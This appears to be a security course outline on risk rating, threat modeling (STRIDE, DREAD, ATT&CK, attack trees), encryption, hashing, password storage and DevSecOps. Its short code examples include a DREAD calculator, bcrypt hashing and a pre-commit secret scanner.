In this section we will learn about risk rating and threat modeling and their roles in the secure SDLC.

In this session, we explore the crucial concept of risk rating, an essential process for identifying, assessing, and prioritizing risks within an IT environment. We discuss various risk rating methodologies, including NIST SP 800-30, FAIR (Factor Analysis of Information Risk), OWASP, and CIS RAM (Center for Internet Security Risk Assessment Method), providing insights into how these frameworks help organizations evaluate the likelihood and impact of potential threats.

The session covers the importance of risk rating during different phases of development, such as application architecture reviews, threat modeling, code reviews, and penetration testing. By understanding and applying risk rating, organizations can better prioritize threats based on their severity, likelihood of occurrence, and contextual factors unique to their industry or business.

We also delve into specific risk scoring techniques, including FAIR's quantitative approach to measuring risk, OWASP's method for assessing web application vulnerabilities, and CIS RAM's focus on cybersecurity impacts and safeguards. Real-world examples and scenarios are used to illustrate how these frameworks can be applied to develop effective mitigation strategies.

Additionally, we discuss the process of deciding which risks to address and how to develop comprehensive mitigation plans. This includes leveraging existing frameworks and best practices, such as the OWASP Top Ten, NIST's Secure Software Development Framework (SSDF), and Microsoft's SDL, to create robust security measures that minimize risk.

Performing a Risk Rating

In this session, we explore the development and implementation of security controls, which are essential measures to counteract various security threats. We categorize these controls into seven main types: Preventative, Detective, Deterrent, Corrective, Recovery, Compensating, and Access Controls, each serving a specific function in safeguarding systems and data.

Threat modeling is a structured approach used to identify, quantify, and address security threats within an application or system. Ideally performed during the early stages of architecture development, it helps define security requirements and mitigate potential vulnerabilities before they become costly to fix. The process involves understanding key elements such as attackers, assets, threats, and risks, and emphasizes the importance of fact-based analysis over assumptions. By integrating threat modeling into the software development life cycle (SDLC), organizations can reduce the attack surface, prioritize mitigation efforts, and improve overall security posture. The approach follows a defense-in-depth model, securing data, applications, hosts, and networks to ensure comprehensive protection while balancing security needs with system functionality.

Threat modeling can be performed using either manual efforts or automated tools, each with its own advantages and limitations. Manual threat modeling offers high quality and customization, requiring only a whiteboard and a team of experts, but it lacks scalability. On the other hand, using tools can scale the process, though it might lead to a "check-the-box" mentality due to varying preferences in tools like Wiki, PowerPoint, or specialized threat modeling software. Various threat modeling methodologies are supported by these tools, such as STRIDE, developed by Microsoft, which categorizes threats into spoofing, tampering, repudiation, information disclosure, denial of service, and elevation of privileges. Each category addresses a different aspect of security, ensuring that systems are analyzed comprehensively for potential vulnerabilities. Other methodologies like OCTAVE and PASTA focus on non-technical risks and attacker perspectives, respectively, offering diverse approaches to identifying and mitigating threats within a system.

Manual threat modeling involves asking critical questions about the system or application to identify potential security risks and vulnerabilities. The process typically begins by assembling a diverse team that includes developers, architects, operations personnel, and security experts. The goal is to create an architecture diagram that visually represents the system, including components like data flows, trust boundaries, and servers. By analyzing each component, the team can identify potential threats and their impacts, such as spoofing, tampering, or information disclosure. The process involves brainstorming what could go wrong, determining the impact if those threats are realized, and proposing mitigation strategies. For instance, in a healthcare application, threat modeling might reveal that cybercriminals could target patient data through phishing attacks. The impact could range from a single compromised record to the entire database being stolen. A potential countermeasure could be implementing multi-factor authentication, especially for critical accounts with elevated access. The exercise helps the team understand what’s at risk and how to protect against those risks, ensuring the system's security is thoroughly analyzed and addressed.

When using the Microsoft Threat Modeling Tool, the first step is to decompose the application by defining the scope and understanding the architecture. This involves creating a detailed diagram that includes components, data stores, data flows, and trust boundaries. The goal is to focus on a small part of the system to complete the threat modeling process effectively. Once the system is outlined, threats are identified and categorized using the STRIDE model, which includes spoofing, tampering, repudiation, information disclosure, denial of service, and elevation of privileges. The tool then helps in analyzing these threats, proposing mitigation strategies, and validating their effectiveness. Finally, you can generate a comprehensive report that includes the diagrams and threat details. The tool is user-friendly, making it accessible even to non-security experts, and helps streamline the threat modeling process for developers.

Demo of Microsoft Threat Model Tool

Demo of OWASP Threat Dragon

This quiz will test your knowledge of threats and risks.

More Advanced Threat Modeling

In threat modeling, several key terms and concepts are essential to understand. An adversary is any individual or group that poses a threat to an organization’s assets. The attack surface represents all possible points where an attacker could target a system, while an attack vector is the specific path or method used to exploit vulnerabilities. An exploit refers to the technique or code that takes advantage of these vulnerabilities. Mitigation involves implementing measures to reduce associated risks. Trust boundaries mark the separation between trusted and untrusted system components, and the principle of least privilege ensures users only have the access necessary to perform their tasks. Security controls are safeguards to protect assets, and security by design integrates security considerations throughout the development life cycle.

DREAD is a threat modeling technique developed by Microsoft, used to assess and prioritize security risks by evaluating the potential impact and risk associated with identified threats and vulnerabilities. DREAD stands for Damage, Reproducibility, Exploitability, Affected Users, and Discoverability. Each factor is scored on a scale of 0 to 10, with 0 representing minimal concern and 10 representing extreme concern. The scores are then summed to determine the overall risk level, helping organizations focus resources on the most critical threats.

For example, in a secure file storage service, the DREAD model might assign a damage score of 7 due to the significant potential loss of sensitive data, a reproducibility score of 5, an exploitability score of 6, an affected users score of 8, and a discoverability score of 7. This would result in a total DREAD score of 33 out of 50, indicating a moderate to high risk that should be prioritized for mitigation. By using DREAD, organizations can systematically assess and address the most significant security threats in a structured and quantifiable manner.
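The arithmetic is simple enough to capture in a small helper; this sketch is illustrative, using the scores from the example above:

```python
def dread_score(damage, reproducibility, exploitability, affected_users, discoverability):
    """Sum the five DREAD factors (each 0-10) into an overall risk score out of 50."""
    factors = (damage, reproducibility, exploitability, affected_users, discoverability)
    if any(not 0 <= f <= 10 for f in factors):
        raise ValueError("each DREAD factor is scored 0-10")
    return sum(factors)

# The file-storage example from the text: 7 + 5 + 6 + 8 + 7 = 33 / 50.
print(dread_score(7, 5, 6, 8, 7))  # 33
```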

The MITRE ATT&CK framework, which stands for Adversarial Tactics, Techniques, and Common Knowledge, is a comprehensive resource for understanding the tactics, techniques, and procedures (TTPs) that cyber adversaries use during various stages of an attack. It categorizes the different stages of an attack, from initial access to the impact on the target system, and offers insights into how attackers operate, which helps in threat modeling and cybersecurity defense strategies. The framework is especially valuable for identifying attack vectors and understanding how different methods of attack can compromise a system, enabling organizations to develop robust defense strategies.

For example, when assessing a banking application using the MITRE ATT&CK framework, security analysts might identify potential threats such as phishing attacks targeting login credentials, session token theft during account reviews, or forged requests for unauthorized fund transfers. To mitigate these threats, the framework suggests a variety of countermeasures including security awareness training, multi-factor authentication (MFA), strong user management practices, and continuous monitoring of account activities. By mapping out these potential attack vectors and implementing appropriate defenses, organizations can better protect their systems and users from cyber threats.

Attack trees are a powerful tool for visualizing and analyzing potential attack scenarios in threat modeling. They start with a specific goal, such as compromising a system, and then branch out to illustrate various ways an attacker could achieve that objective. By breaking down the steps required for an attack, security professionals can better understand and address vulnerabilities in their systems. Additionally, attack libraries like the Common Attack Pattern Enumeration and Classification (CAPEC) and the MITRE ATT&CK framework offer comprehensive databases of known attack patterns and techniques, enabling more accurate identification and mitigation of threats.

Other threat modeling techniques include methodologies like Trike, which integrates elements from multiple threat modeling approaches, including STRIDE, DREAD, and attack trees, to create a unified framework for security auditing from a risk management perspective. OCTAVE focuses on the business impact of threats and is often used for enterprise-level assessments, while PASTA is a seven-step, risk-centric framework that emphasizes understanding the business context of applications and systems. These methodologies provide structured approaches to identifying, analyzing, and mitigating security risks, making them essential tools for organizations aiming to protect their assets from potential threats.

Attack trees are a crucial tool in threat modeling that visually represent the various ways an attacker could compromise a system. By starting with a specific malicious objective, such as compromising a privileged user account, an attack tree breaks down this goal into sub-goals and tactics that an attacker might use, such as identifying a user with the account, attempting brute force attacks, or engaging in phishing schemes. Each node in the tree represents a potential method or condition required for the attack, and by analyzing these nodes, security teams can better understand vulnerabilities and prioritize their defenses accordingly.

To build an attack tree, you start by defining the attacker's main objective and then progressively break it down into smaller tasks. Each step in the process can be evaluated in terms of its cost or likelihood, which helps in assessing the overall risk of the attack. Tools like Deciduous make this process more intuitive by allowing users to graphically represent these attack paths, identify mitigating factors, and calculate the potential impact of different attack scenarios. In Deciduous, elements like facts, attacks, mitigations, and goals are color-coded to enhance clarity, making it easier to visualize and communicate the potential security risks within a system.
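A toy evaluator shows how those cost estimates propagate through a tree (the structure and numbers here are invented for illustration): OR nodes take the cheapest branch, while AND nodes require every step and so sum their children:

```python
# A toy attack-tree evaluation under assumed attacker costs.
def cost(node):
    if "cost" in node:  # leaf: a concrete attacker action
        return node["cost"]
    child_costs = [cost(c) for c in node["children"]]
    return min(child_costs) if node["type"] == "OR" else sum(child_costs)

tree = {  # goal: compromise a privileged account (values are illustrative)
    "type": "OR",
    "children": [
        {"cost": 60, "name": "brute force the password"},
        {"type": "AND", "children": [
            {"cost": 10, "name": "craft phishing email"},
            {"cost": 15, "name": "host fake login page"},
        ]},
    ],
}
print(cost(tree))  # 25 -- phishing is the cheapest path to the goal
```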

Demo of an attack tree

Continuous threat modeling is an approach that integrates the identification and mitigation of security threats throughout the entire software development life cycle, from initial design through to deployment. By incorporating threat modeling early, particularly during the design phase, and continuously updating it as the code and application evolve, teams can address potential vulnerabilities when they are least costly to mitigate. This approach aligns with Agile and DevOps methodologies, ensuring that security keeps pace with development and adapts to changing requirements, technologies, and emerging threats.

Key components of continuous threat modeling include early integration, where threats are identified and addressed as they arise; automation, which helps in detecting common security issues; and a risk-based approach, which prioritizes the most critical threats. Continuous threat modeling also emphasizes collaboration between development, operations, and security teams (DevSecOps), ensuring that security is an integral part of the development process. Regular assessments and updates ensure that the threat model remains effective, and the use of real-world threat intelligence allows security teams to stay ahead of potential risks.

Demo of Threagile

Threat modeling in the cloud involves recognizing both the unique advantages and challenges posed by cloud environments. Cloud systems typically benefit from built-in controls offered by cloud service providers (CSPs), which can enhance security. However, certain threats, such as administrative account compromise, can be more severe in the cloud, while others, like infrastructure protocol denial of service, might be less critical due to the inherent qualities of cloud services.

When creating a cloud threat model, it’s essential to consider not only the specific business objectives and cloud technologies being used but also the threats that could impact your CSP and, consequently, your operations. The rapid adoption of cloud technologies has sometimes outpaced traditional security methodologies, making it crucial to align threat modeling practices with the specifics of cloud services. The process involves identifying objectives, defining the scope, decomposing the application or service, identifying and rating threats, recognizing design weaknesses, designing mitigations, and regularly reevaluating the system. This structured approach helps ensure that organizations can effectively manage the unique security challenges of cloud environments, from IAM service configurations to cross-account access and data security.

Threat Modeling Quiz

Introduction to Encryption and Hashing

In this section, we covered the basics of encryption, focusing on the two main types: symmetric and asymmetric encryption. Symmetric encryption uses the same key for both encryption and decryption, making it fast and efficient for encrypting large amounts of data, with AES being the most well-known algorithm in this category. However, it poses challenges in securely distributing the encryption key. Asymmetric encryption, on the other hand, uses a pair of keys—public and private—where the public key is freely distributed, and the private key is kept secret. This method provides non-repudiation, meaning the sender cannot deny having sent a message, and it eliminates the need for securely sharing a secret key between parties. However, asymmetric encryption is slower and more complex, making it less ideal for large data encryption. Understanding the strengths and weaknesses of each type is crucial for selecting the appropriate encryption method based on the specific use case.
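A minimal symmetric-encryption round trip in Python, using the `cryptography` package's AES-based Fernet recipe (the library choice is an assumption for illustration):

```python
from cryptography.fernet import Fernet

key = Fernet.generate_key()  # the single shared secret -- distributing
f = Fernet(key)              # it securely is the hard part

ciphertext = f.encrypt(b"card number: 4111 1111 1111 1111")
print(f.decrypt(ciphertext))  # b'card number: 4111 1111 1111 1111'
```

The single shared key here is exactly the distribution problem that asymmetric encryption is designed to solve.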

Various use cases for encryption

In this section, we explored the concept of hashing, which is a one-way process that generates a fixed output from an input, ensuring that the same input always produces the same hash. Hashing is crucial in various applications, including password storage, blockchain technology, integrity verification, and digital signatures. We also discussed several types of attacks on hashing algorithms, such as collision attacks, where two different inputs produce the same hash, and preimage attacks, where an attacker tries to reverse-engineer a hash to find its original input. Other attacks include dictionary and rainbow table attacks, which use precomputed tables to find hash matches, and birthday attacks, which exploit the probability of collisions. Understanding these potential vulnerabilities is essential for implementing secure hashing practices.
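The one-way, deterministic behavior is easy to see with Python's standard hashlib (illustrative):

```python
import hashlib

# The same input always yields the same digest; any change breaks it.
print(hashlib.sha256(b"release-1.4.2.tar.gz contents").hexdigest())
print(hashlib.sha256(b"release-1.4.2.tar.gz contents!").hexdigest())  # completely different

# One-way: there is no practical way to recover the input from the digest,
# which is why fast hashes still need salting and a slow KDF for passwords.
```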

Hashing in action

In this section, we discussed Digital Certificates and Public Key Infrastructure (PKI), focusing on their roles in securing digital communications. A digital certificate, also known as an identity or public key certificate, is an electronic document that proves ownership of a public key, containing information about the key, its owner, and the digital signature of a trusted Certificate Authority (CA) that has verified the certificate's contents. These certificates are essential for authenticating the identity of websites, users, devices, and servers, ensuring secure communication over the internet. PKI is a comprehensive system that manages public key encryption and digital certificates, involving various components like Certificate Authorities, Registration Authorities, and Certificate Management Systems. PKI provides robust encryption and authentication, making it critical for enterprise security. We also touched on Certificate-Based Authentication (CBA), which uses digital certificates for verifying identities, offering enhanced security by reducing reliance on traditional passwords.

In this session, we explored essential practices for password security, focusing on creating strong, unique passwords, implementing secure storage mechanisms, and utilizing advanced authentication methods. Key recommendations include using long, random passwords, enabling multi-factor authentication, and securely storing passwords with cryptographic hashing techniques like Argon2, scrypt, or bcrypt. Salting and hashing ensure that even if password hashes are compromised, they remain difficult to crack. Additionally, understanding entropy's role in password strength helps in creating more secure systems. By following these best practices, organizations can effectively protect against password-related vulnerabilities and enhance overall security.
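A short sketch of salted, work-factor-tunable password hashing using the bcrypt package (one of the algorithms recommended above; the specific library is an assumption):

```python
import bcrypt  # pip install bcrypt

password = b"correct horse battery staple"

# gensalt() embeds a per-password random salt and a tunable work factor.
hashed = bcrypt.hashpw(password, bcrypt.gensalt(rounds=12))

print(bcrypt.checkpw(password, hashed))     # True
print(bcrypt.checkpw(b"guess123", hashed))  # False
```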

Password best practices demo

This quiz will test your knowledge of encryption and hashing.

DevSecOps and Secure CI/CD

In this section, we explored the concepts of DevOps and CI/CD (Continuous Integration and Continuous Delivery/Deployment). DevOps is a cultural and philosophical approach that emphasizes collaboration between development and operations teams, aiming to deliver high-quality products swiftly and efficiently. It integrates Agile and Lean principles to foster gradual development and fast software delivery.

In this section, we explore the concept of DevSecOps, which is the integration of security practices into the DevOps process to ensure that security is a fundamental part of software delivery from the very beginning. DevSecOps aims to achieve secure software delivery at high speeds without compromising the integrity or safety of the application. The core principle of DevSecOps is to embed security throughout the entire development lifecycle, fostering a culture where everyone, from developers to operations teams, is responsible for security.

In this section, we explored the role of design within a DevSecOps framework, emphasizing the importance of threat modeling. Threat modeling is a structured approach to identifying and managing potential security threats, focusing on the most critical vulnerabilities during the design phase. By integrating this process early in the development lifecycle, organizations can reduce remediation costs, improve understanding of system interactions, and create detailed representations of the architecture and data flows.

The threat modeling process involves defining the scope by identifying system boundaries and critical assets, creating diagrams that outline data flows and architecture, using methodologies like STRIDE to identify potential threats, assessing risks using models like DREAD, and defining strategies to mitigate those threats. This process is not a one-time task but a continuous, collaborative effort that is regularly updated throughout the development lifecycle, ensuring that security is embedded into the design from the start. As development moves from design to implementation, these insights from threat modeling guide secure coding practices and overall system integrity.

In a DevSecOps environment, coding practices remain consistent with traditional SDLC processes, but with a stronger emphasis on automating the detection of vulnerabilities, particularly regarding secrets and code quality. One key focus is secret scanning, which aims to prevent the exposure of sensitive information like passwords and secret keys. This is crucial since hard-coded credentials are a prevalent issue highlighted by OWASP and various bug bounty programs. To mitigate this, tools and practices should be implemented to scan for secrets at multiple stages, including pre-commit stages, within code repositories, and throughout the CI/CD pipeline. Pre-commit hooks can provide immediate feedback to developers, preventing sensitive data from being committed. Additionally, regular repository scans should be conducted to identify and remove any exposed secrets, treating them as compromised and invalidating them immediately.
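To make the pre-commit idea concrete, here is a toy secret scanner in Python; the patterns and behavior are illustrative, and real tools (e.g., gitleaks) are far more thorough:

```python
import re
import sys

# Illustrative patterns for common classes of committed secrets.
PATTERNS = {
    "AWS access key": re.compile(r"AKIA[0-9A-Z]{16}"),
    "private key header": re.compile(r"-----BEGIN (?:RSA |EC )?PRIVATE KEY-----"),
    "hard-coded password": re.compile(r"password\s*=\s*['\"][^'\"]+['\"]", re.IGNORECASE),
}

def scan(path: str) -> list[str]:
    findings = []
    with open(path, encoding="utf-8", errors="ignore") as fh:
        for lineno, line in enumerate(fh, 1):
            for label, pattern in PATTERNS.items():
                if pattern.search(line):
                    findings.append(f"{path}:{lineno}: possible {label}")
    return findings

if __name__ == "__main__":
    hits = [hit for path in sys.argv[1:] for hit in scan(path)]
    print("\n".join(hits))
    sys.exit(1 if hits else 0)  # a non-zero exit blocks the commit
```

Wired into a pre-commit hook, the non-zero exit code stops the commit and gives the developer the immediate feedback described above.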
